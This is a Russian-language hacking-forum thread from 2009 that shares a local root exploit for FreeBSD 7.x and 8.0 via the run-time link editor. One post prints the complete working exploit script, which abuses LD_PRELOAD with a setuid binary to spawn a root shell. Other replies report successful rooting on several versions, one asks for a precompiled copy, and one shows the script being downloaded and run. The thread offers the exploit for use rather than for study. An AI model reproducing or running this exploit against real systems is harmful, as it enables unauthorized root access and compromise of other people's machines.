ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
FreeBSD 7.1, 8 root expl. |
01.12.2009, 13:07
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
FreeBSD 7.1, 8 root expl.
###############################
# EDB-ID: 10255
# CVE-ID: ()
# Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday
# Author: Kingcope
# Published: 2009-11-30
###############################
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"
Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
http://www.exploit-db.com/exploits/10255
|
|
|
01.12.2009, 15:32
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.
|
|
|
|
01.12.2009, 16:18
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
7.0 поестил результат рут)
Тс респект)
7.2 тоже.
Последний раз редактировалось DimOnOID; 01.12.2009 в 16:45..
|
|
|
|
05.12.2009, 23:25
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
7.1 рутит
|
|
|
|
16.12.2009, 02:12
|
|
Познающий
Регистрация: 13.06.2009
Сообщений: 32
Провел на форуме:
42683
Репутация:
2
|
|
закинте плз в откомпелированом виде)
|
|
|
|
17.12.2009, 04:10
|
|
Banned
Регистрация: 11.05.2009
Сообщений: 128
Провел на форуме:
718288
Репутация:
72
|
|
7.1 Срутил.Спасибо.
|
|
|
|
19.12.2009, 05:51
|
|
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846
Репутация:
55
|
|
сам експлоит
PHP код:
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
7.1 - взяло рут
6.4 - не взяло |
|
|
|
19.12.2009, 05:58
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
добряк, ТС, добряк
спасибо, порутал
|
|
|
|
12.01.2010, 18:35
|
|
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103
Репутация:
15
|
|
FreeBSD 7.1-RELEASE-p5
рут - успешно
|
|
|
|
20.01.2010, 22:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
У меня он не запускается, пишет, что файл не найден...
Мои действия:
Код:
$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
